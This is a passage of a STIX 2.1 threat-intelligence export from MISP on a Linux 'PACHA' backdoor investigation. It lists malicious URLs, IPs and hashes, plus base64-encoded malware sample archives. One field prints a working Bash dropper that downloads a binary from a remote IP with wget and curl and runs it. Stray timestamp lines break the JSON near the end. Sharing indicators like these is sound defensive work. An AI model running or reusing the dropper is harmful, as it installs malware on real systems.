qLBm6ZnVXw0X+oQ15lgWEDvJwZRRTB2DnoVoixUmbIKWNzfCdbF/Hc6Mnwbzkh/fDu944KlIl1BzZuShQyNk9Q9zxcXC2xd8xhEgTOQd3dn7dpq0xH0S/LZ6XAZtcZOW9lkuSSsgfDoIx64pyFDaFd+oO1QrIYd10MKAm6NLMZTzBPnlc/GbJC1QCFRYc59SiOhS4s07Z1P30o0qjh/ivYiRQVRGRdo8XEvfiFFTcXCQTCr0OdOE0q/B16NJdhzNB+zLnH3sP1WyDOEcY/Fhvp2S4kprQnnLIk3/CQcFvamzeayz1t+7lhCQ+Bjfxapukc5lUrU36QQSBuDcL40pQp5u4cdkTh3yK/ycNgdJyK3nXTq0gycF2ybHeD7kONCN/2tISJfP4+hEPmxeTjzw4LaC3kAlexHpPIRQZTdChb1wFpq2TRO8BrTL8XlkFfd/KNtm87VX+g/UnRVFQ4aDK+Y0JaZua2yIOgkveHOjPTsfZDRHoKtLEZqYHkL+aocgAYSieNuZ19LE8G0wknaRSfnqbWMcG7I1awyQQZB942VPFTn8CuMANXiYsh3Nsk3rK6HBgaztCPmIKeQXuthUE0iF/eCEtDqvCbb4jkT4i0TIuHQ7VPKtEZ/t5jN+jPsL0PbVaYXblop5PfOBdoG/0kvTL0nZ4pLYo8QewFjvYfqrKAsYmk4tMl4FB7DLWQTSoQpn/BKuo0Y0J5yVQVQu5bktuGGyfggbWEM6lCP0pEQ8xHbxWAIU6XNQlbw4CBBny5vZ2OxpYkEmgrbE0I5a68b6riZDlUKnT5bp1mocLIqry8KCncy8TZuomAOuXY6O/6uE5OwV7i/YEg94fxh7EXwX9oWgvaa8Mmw0Gzhzq8Khq7EKBIUWcSEOckquDvS1u9JJ31aIAvfSUqhmsXHZBoV+pyQESWaQybyyAIIMhRHO+ygDEhraEqD2EQ36+GG39EXdlphDmlQCErc0qBy4Vf7luVda11rwHzzE2NWUt6bjw70vQ69d+jvigFHtbraKZBpg61Ku6i3EarxNn0H1vIhkgeV2ikLIx8Xo13cmbc8p5ZEtjT5MaqAYb9TlQSQHzLPl5CAqnrSbTeB6F0e2TEl0C8eExw1GvJJyMT7ZtN8tcHrOW3BQuA7jqIIsB6fvj2KNxwsnDCwgg5gJkg/je7udCCs43zPKPg2BPoe7NtadfCmyOj+0vs1JqnAaiR1OWgO5z+ndG31j0+4y4j72mQGp5ikrjb7pEfl/lSzkYrvRJAIerSsw9cx5rzNdJkO7w3Ubm1O6Vbbb5FBL3HWbzUNt097lUKZ6PJxOsHL+FLpaSF3KRtZMKHvxhkmmEliTPeTSYS+0qt/shyrVKHJkm1UrKawmHOOHV5Poxy4T0G5meSuK8s5TEQQk6LwSWRewCfF5xTNymCZU54GvHNnZr1ReXklSPULrjk6L9rtnAPbbk1ri2Ov1Z26yeca/9eZq+TlnLNjNaIH1ePuwKr22hiAM/IjHOGGToU5vNDRlGbvMq8vSj3wjRBhXNyUxmeoqY6/R6s94NVzMmk9Kbs+erp9ldhqTwvfSopOhiq9TCvgiwvL1Tcc/G/AL99wk3sApLdU8a3vyIz7eaFIjH3ZaF2YaXlCijKLw+SjKaaTi6DwNWHN7LsQiHgmct8fXy73QdbYfXtvzxiMpLtP5GsTrhH71LDQLJK1ELl5yJ2ZEikg
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T08:28:07Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf237b6-06bc-4e57-ad7e-31bb950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:30:46.000Z",
"modified": "2019-06-01T08:30:46.000Z",
"pattern": "[url:value = 'http://87.236.212.237/tmp/ofd' AND url:x_misp_host = '87.236.212.237' AND url:x_misp_scheme = 'http' AND url:x_misp_resource_path = '/tmp/ofd']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T08:30:46Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"url\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "malware",
"spec_version": "2.1",
"id": "malware--5cf23812-2ae8-4feb-8e8b-4a1f950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:35:54.000Z",
"modified": "2019-06-01T08:35:54.000Z",
"is_family": false,
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "misc"
}
],
"implementation_languages": [
"Bash"
],
"labels": [
"misp:name=\"script\"",
"misp:meta-category=\"misc\"",
"misp:to_ids=\"False\""
],
"x_misp_script": "#!/bin/sh\r\nid1=\"fkbgh\"\r\nid2=\"jm\"\r\nif [ -x \"/tmp/\" ] && [ -w \"/tmp/\" ]; then\r\nwget -O /tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /tmp/`echo $id1`\r\nchmod 7777 /tmp/`echo $id1`\r\n/tmp/`echo $id1` &\r\nelif [ -x \"/var/tmp/\" ] && [ -w \"/var/tmp/\" ]; then\r\nwget -O /var/tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /var/tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /var/tmp/`echo $id1`\r\nchmod 7777 /var/tmp/`echo $id1`\r\n/var/tmp/`echo $id1` &\r\nelif [ -x \"/dev/shm/\" ] && [ -w \"/dev/shm/\" ]; then\r\nwget -O /dev/shm/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /dev/shm/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /dev/shm/`echo $id1`\r\nchmod 7777 /dev/shm/`echo $id1`\r\n/dev/shm/`echo $id1` &\r\nelif [ -x $JBOSS_HOME ] && [ -w $JBOSS_HOME ]; then\r\nwget -O $JBOSS_HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o $JBOSS_HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x $JBOSS_HOME/`echo $id1`\r\nchmod 7777 $JBOSS_HOME/`echo $id1`\r\n$JBOSS_HOME/`echo $id1` &\r\nelif [ -x $HOME ] && [ -w $HOME ]; then\r\nwget -O $HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o $HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x $HOME/`echo $id1`\r\nchmod 7777 $HOME/`echo $id1`\r\n$HOME/`echo $id1` &\r\nelse\r\nwget -O `echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o `echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x `echo $id1`\r\nchmod 7777 `echo $id1`\r\n`echo $id1` &\r\nfi",
"x_misp_state": "Malicious"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf238a2-0e5c-447e-a584-4072950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:34:42.000Z",
"modified": "2019-06-01T08:34:42.000Z",
"pattern": "[url:value = 'http://185.165.169.6/jp/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T08:34:42Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"url\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf2397c-b0a0-475d-b764-4c2a950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:38:20.000Z",
"modified": "2019-06-01T08:38:20.000Z",
"pattern": "[url:value = 'http://87.236.212.237/tmp/ofd' AND url:x_misp_scheme = 'http']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T08:38:20Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"url\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf23a31-1db8-4b41-81af-4416950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:41:21.000Z",
"modified": "2019-06-01T08:41:21.000Z",
"description": "Used as proxy",
"pattern": "[url:value = 'http://41.203.146.142:8080']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T08:41:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"url\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf23ef7-5138-4a1f-b773-4766950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T09:03:10.000Z",
"modified": "2019-06-01T09:03:10.000Z",
"pattern": "[file:hashes.MD5 = '9ae7dc5ff13526e8cc5b8c236066a828' AND file:hashes.SHA1 = '69af27d553292952e4d93338c44b0f4e66a15470' AND file:hashes.SHA256 = '3d02bbddc185352ddc1dea20f54e2f2b39f180a9bd26d8453b5ad7b983466c95' AND file:name = '3d02bbddc185352ddc1dea20f54e2f2b39f180a9bd26d8453b5ad7b983466c95' AND file:size = '58088' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T09:03:10Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf23fe9-25c8-47df-a38a-4325950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T09:05:45.000Z",
"modified": "2019-06-01T09:05:45.000Z",
"description": "Most probably compromised host",
"pattern": "[(network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '45.77.54.157')]",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T09:05:45Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"ip-port\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf24083-6de0-42e3-9ae7-4129950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T09:09:51.000Z",
"modified": "2019-06-01T09:09:51.000Z",
"pattern": "[file:hashes.MD5 = 'f049ae13406fdebadb10960bc0deee87' AND file:hashes.SHA1 = 'da05b42311606eaa03ca8edd6a94ff2eacd44c2b' AND file:hashes.SHA256 = '62ca3fd070d6447e844c76e4bedcce908a18bc275c1a713415d11838b1cb5f04' AND file:name = 'slpr' AND file:size = '88728' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T09:09:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf240b4-352c-40a3-8aba-40b5950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T09:09:08.000Z",
"modified": "2019-06-01T09:09:08.000Z",
"pattern": "[url:value = '37.228.129.58/home/slpr' AND url:x_misp_scheme = 'http' AND url:x_misp_resource_path = '/home/slpr']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T09:09:08Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"url\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5cf241f4-75b0-43e7-80fe-4487950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T09:18:00.000Z",
"modified": "2019-06-01T09:18:00.000Z",
"labels": [
"misp:name=\"microblog\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "post",
"value": "latest iptables commands found in new linux #PACHA backdoor sample, MD5=a4ef2477af0c769bb2043bca6b5843c2, the ACCEPTED IP should all be blacklisted.",
"category": "Other",
"uuid": "5cf241f4-6b14-49eb-a550-4c70950d210f"
},
{
"type": "text",
"object_relation": "type",
"value": "Twitter",
"category": "Other",
"uuid": "5cf241f4-0f14-491e-b20a-40fa950d210f"
},
{
"type": "url",
"object_relation": "url",
"value": "https://twitter.com/liuya0904/status/1134660970112999425",
"category": "Network activity",
"to_ids": true,
"uuid": "5cf241f4-ce4c-45d4-b3f5-465a950d210f"
},
{
"type": "text",
"object_relation": "username",
"value": "liuya0904",
"category": "Other",
"uuid": "5cf241f4-51f8-4638-bd9d-4623950d210f"
},
{
"type": "text",
"object_relation": "state",
"value": "Informative",
"category": "Other",
"uuid": "5cf241f4-54ac-4527-ae4e-45b3950d210f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "microblog"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5cf24424-33b4-488b-8202-4db5950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T09:23:48.000Z",
"modified": "2019-06-01T09:23:48.000Z",
"labels": [
"misp:name=\"annotation\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "format",
"value": "markdown",
"category": "Other",
"uuid": "5cf24424-8ee8-46e5-93a9-4a45950d210f"
},
{
"type": "text",
"object_relation": "type",
"value": "Annotation",
"category": "Other",
"uuid": "5cf24424-1584-4e9c-9fea-45e7950d210f"
},
{
"type": "text",
"object_relation": "text",
"value": "OSINT investigation based on the original tweet from Liu Ya which contains a netfilter/iptables script with some IP addresses. By pivoting from the IP addresses, malware samples and script can be found at different locations. This quick analysis include the scripts collected, the samples and the relationships between the various objects.",
"category": "Other",
"uuid": "5cf24424-c33c-4187-8f6d-4907950d210f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "annotation"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--f5b7e7ab-0b50-4285-ac22-baa90eafe67c",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T07:57:37.000Z",
"modified": "2019-06-01T07:57:37.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8",
"target_ref": "x-misp-object--35f44d09-4103-4f11-a1dd-74fb99172734"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--60ac44d9-d531-45b1-8a21-5f140e87475b",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T07:58:21.000Z",
"modified": "2019-06-01T07:58:21.000Z",
"relationship_type": "connects-to",
